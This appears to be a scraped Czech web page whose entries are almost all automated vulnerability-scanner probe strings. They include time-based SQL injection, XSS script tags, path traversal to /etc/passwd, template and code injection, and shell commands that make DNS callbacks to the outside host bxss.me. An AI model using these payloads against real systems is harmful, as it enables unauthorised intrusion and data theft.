|
GQDWBdMu<esi:include src="http://bxss.me/rpb.png"/>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
response.write(9233511*9703275)
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
aaaa
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
aaaa
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
aaa
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
aa
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
a
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
Http://bxss.me/t/fit.txt
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
client
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
../../../../../../../../../../../../../../etc/passwd
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
../../../../../../../../../../../../../../windows/win.ini
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
(nslookup hitsiqsankqapea02d.bxss.me||perl -e "gethostbyname('hitsiqsankqapea02d.bxss.me')")
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
GQDWBdMu'"()&%<acx><ScRiPt >ljA6(9974)</ScRiPt>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
GQDWBdMu9994065
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
acu1557<s1﹥s2ʺs3ʹuca1557
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
<%={{={@{#{${acx}}%>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
acx[[${98991*97996}]]xca
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
acx__${98991*97996}__::.x
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
-1 OR 2+896-896-1=0+0+0+1 --
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
if(now()=sysdate(),sleep(15),0)
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
2xGDgYdj' OR 52=(SELECT 52 FROM PG_SLEEP(15))--
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
GQDWBdMu'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
^(#$!@#$)(()))******
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
response.write(9545575*9068152)
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
'+response.write(9545575*9068152)+'
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
"+response.write(9545575*9068152)+"
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
${@print(md5(31337))}\
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
'.print(md5(31337)).'
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
GQDWBdMu<esi:include src="http://bxss.me/rpb.png"/>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
'"()
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
GQDWBdMu&n987533=v998026
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
)
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
"+"A".concat(70-3).concat(22*4).concat(104).concat(71).concat(106).concat(81)+(require"socket" Socket.gethostbyname("hitpf"+"xyziqoxbf9cc2.bxss.me.")[3].to_s)+"
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
!(()&&!|*|*|
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
HttP://bxss.me/t/xss.html?%00
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
bxss.me/t/xss.html?%00
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
Http://bxss.me/t/fit.txt
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
http://bxss.me/t/fit.txt?.jpg
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
client
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
client/.
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
DGMq7XEB
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
'.gethostbyname(lc('hitow'.'yuzjdyor53553.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(79).chr(104).chr(79).'
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
../../../../../../../../../../../../../../etc/passwd
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
../../../../../../../../../../../../../../windows/win.ini
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
${9999724+9999711}
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
echo qoucjh$()\ bvjkht\nz^xyu||a #' &echo qoucjh$()\ bvjkht\nz^xyu||a #|" &echo qoucjh$()\ bvjkht\nz^xyu||a #
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
';print(md5(31337));$a='
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
(nslookup hitjehdbmbhgwb7d8d.bxss.me||perl -e "gethostbyname('hitjehdbmbhgwb7d8d.bxss.me')")
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
${@print(md5(31337))}\
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
`(nslookup hitzgzbwfrkfm86543.bxss.me||perl -e "gethostbyname('hitzgzbwfrkfm86543.bxss.me')")`
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
"+"A".concat(70-3).concat(22*4).concat(116).concat(82).concat(98).concat(68)+(require"socket" Socket.gethostbyname("hittr"+"tdmbiuqgb0e1c.bxss.me.")[3].to_s)+"
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
1some_inexistent_file_with_long_name.jpg
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
HttP://bxss.me/t/xss.html?%00
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
Http://bxss.me/t/fit.txt
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
http://bxss.me/t/fit.txt?.jpg
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
^(#$!@#$)(()))******
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
/xfs.bxss.me
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
'"
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
client/.
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
".gethostbyname(lc("hitcm"."kgequszf0796a.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(78).chr(98).chr(73)."
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
GQDWBdMu<esi:include src="http://bxss.me/rpb.png"/>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
'+response.write(9611044*9745224)+'
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
../../../../../../../../../../../../../../etc/passwd
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
../GQDWBdMu
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
GQDWBdMu&n971162=v948076
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
'"()
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
${@print(md5(31337))}\
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
'+'A'.concat(70-3).concat(22*4).concat(109).concat(86).concat(111).concat(66)+(require'socket' Socket.gethostbyname('hitwe'+'cizpecgh13ad6.bxss.me.')[3].to_s)+'
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
HttP://bxss.me/t/xss.html?%00
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
1some_inexistent_file_with_long_name.jpg
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
!(()&&!|*|*|
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
echo kyanmg$()\ vsbbug\nz^xyu||a #' &echo kyanmg$()\ vsbbug\nz^xyu||a #|" &echo kyanmg$()\ vsbbug\nz^xyu||a #
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
client/.
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
&echo eyjkjt$()\ hdmbkd\nz^xyu||a #' &echo eyjkjt$()\ hdmbkd\nz^xyu||a #|" &echo eyjkjt$()\ hdmbkd\nz^xyu||a #
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
|echo vxokvd$()\ xkjybt\nz^xyu||a #' |echo vxokvd$()\ xkjybt\nz^xyu||a #|" |echo vxokvd$()\ xkjybt\nz^xyu||a #
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
<!--
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
GQDWBdMu9467696
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
<th:t="${acx}#foreach
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
GQDWBdMu'"()&%<acx><ScRiPt >R7rG(9720)</ScRiPt>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
acx{{98991*97996}}xca
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
GQDWBdMu<esi:include src="http://bxss.me/rpb.png"/>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
';print(md5(31337));$a='
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
UmxINElVR1E=
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
<%={{={@{#{${acx}}%>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
acx[[${98991*97996}]]xca
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
acx__${98991*97996}__::.x
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
!(()&&!|*|*|
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
1some_inexistent_file_with_long_name.jpg
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
'"
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
|echo kpgqua$()\ uknsin\nz^xyu||a #' |echo kpgqua$()\ uknsin\nz^xyu||a #|" |echo kpgqua$()\ uknsin\nz^xyu||a #
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
|(nslookup hitzsonbvkpooddc89.bxss.me||perl -e "gethostbyname('hitzsonbvkpooddc89.bxss.me')")
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
1ChLIqY8HGO
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
<th:t="${acx}#foreach
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
acx[[${98991*97996}]]xca
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
-1 OR 2+291-291-1=0+0+0+1
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
-1' OR 2+819-819-1=0+0+0+1 --
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
-1' OR 2+551-551-1=0+0+0+1 or 'YHmHo8ey'='
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
if(now()=sysdate(),sleep(15),0)
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
-1 OR 2+384-384-1=0+0+0+1 --
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
-1' OR 2+537-537-1=0+0+0+1 --
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
1 waitfor delay '0:0:15' --
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
1 waitfor delay '0:0:15' --
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
w5AnAMvD'; waitfor delay '0:0:15' --
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
-1 OR 2+570-570-1=0+0+0+1 --
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
-1' OR 2+58-58-1=0+0+0+1 --
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
K5REQXYN')) OR 597=(SELECT 597 FROM PG_SLEEP(15))--
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
GQDWBdMu'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
1'"
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
1 waitfor delay '0:0:15' --
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
lf7CbaCH')) OR 332=(SELECT 332 FROM PG_SLEEP(15))--
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
@@yHI0O
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
-1 OR 2+51-51-1=0+0+0+1 --
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
|
|
1. 1. 1967
|
0
|
|
Sloučit
|
|
@@LtDYX
|
|
1. 1. 1967
|
0
|
|
Sloučit
|